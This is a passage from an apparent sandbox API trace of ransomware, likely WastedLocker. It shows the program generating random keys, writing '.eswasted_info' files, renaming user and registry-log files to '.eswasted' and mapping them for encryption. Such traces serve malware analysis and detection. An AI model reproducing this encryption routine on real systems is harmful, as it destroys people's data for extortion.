(HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.659] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.660] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.660] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Q4qjzsKde1yg4RDN.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\q4qjzskde1yg4rdn.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.660] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.661] SetEndOfFile (hFile=0x108) returned 1 [0081.661] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.662] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Q4qjzsKde1yg4RDN.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\q4qjzskde1yg4rdn.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Q4qjzsKde1yg4RDN.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\q4qjzskde1yg4rdn.swf.eswasted")) returned 1 [0081.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Q4qjzsKde1yg4RDN.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\q4qjzskde1yg4rdn.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.662] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.663] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.664] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.664] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.664] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.665] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.665] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.720] SetEndOfFile (hFile=0x108) returned 1 [0081.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.723] CloseHandle (hObject=0x108) returned 1 [0081.724] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0081.724] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.725] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.725] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.725] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0081.725] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x6f5cc0 [0081.725] lstrcpyW (in: lpString1=0x6f5d26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.726] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.726] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.726] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.726] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.eswasted_info" (normalized: "c:\\users\\default\\contacts\\administrator.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.727] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.728] SetEndOfFile (hFile=0x108) returned 1 [0081.728] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.728] lstrcpyW (in: lpString1=0x6f5d26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.eswasted")) returned 1 [0081.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.730] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0082.150] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0082.151] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.151] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.151] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0082.152] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0082.152] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.160] SetEndOfFile (hFile=0x108) returned 1 [0082.162] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.162] CloseHandle (hObject=0x108) returned 1 [0082.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0082.165] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0082.166] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0082.166] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.166] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0082.166] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x292) returned 0x6f5cc0 [0082.166] lstrcpyW (in: lpString1=0x6f5d48, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.166] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.166] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0082.167] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.167] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0082.168] WriteFile (in: hFile=0x108, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.169] SetEndOfFile (hFile=0x108) returned 1 [0082.169] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.169] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.169] lstrcpyW (in: lpString1=0x6f5d48, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.eswasted")) returned 1 [0082.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0082.171] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0082.171] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0082.172] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.172] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.172] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0082.173] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0082.173] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.181] SetEndOfFile (hFile=0x108) returned 1 [0082.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.183] CloseHandle (hObject=0x108) returned 1 [0082.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0082.263] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0082.264] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0082.264] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.264] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0082.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x6f5cc0 [0082.264] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0082.264] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0082.265] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0082.265] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0082.265] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.267] SetEndOfFile (hFile=0x108) returned 1 [0082.267] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.267] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0082.267] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.eswasted")) returned 1 [0082.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.268] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0082.268] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0082.269] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.269] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.269] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0082.270] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0082.270] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.278] SetEndOfFile (hFile=0x108) returned 1 [0082.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0082.281] CloseHandle (hObject=0x108) returned 1 [0082.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0082.282] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0082.283] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0082.283] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.283] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0082.283] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x709030 [0082.283] lstrcpyW (in: lpString1=0x709076, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.283] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0082.283] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0082.284] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0082.284] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0082.285] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.286] SetEndOfFile (hFile=0x108) returned 1 [0082.286] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.286] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0082.286] lstrcpyW (in: lpString1=0x709076, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log.eswasted")) returned 1 [0082.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0082.287] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0082.291] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0082.292] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.292] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0082.292] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0082.293] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0082.293] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0082.301] SetEndOfFile (hFile=0x108) returned 1 [0082.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.303] CloseHandle (hObject=0x108) returned 1 [0082.305] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709030 | out: hHeap=0x6d0000) returned 1 [0082.305] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0082.306] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0082.306] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0082.306] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0082.306] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x6f5cc0 [0082.306] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.306] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.306] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0082.307] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.307] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0082.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0082.308] WriteFile (in: hFile=0x108, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.308] SetEndOfFile (hFile=0x108) returned 1 [0082.309] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.309] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.309] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted")) returned 1 [0082.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.350] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0082.366] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0082.394] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.394] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.394] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0082.395] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0082.395] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.404] SetEndOfFile (hFile=0x108) returned 1 [0082.406] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.406] CloseHandle (hObject=0x108) returned 1 [0082.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0082.411] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0082.412] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0082.412] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.412] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0082.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ec) returned 0x70c160 [0082.412] lstrcpyW (in: lpString1=0x70c242, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.412] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0082.413] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.413] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted_info"), 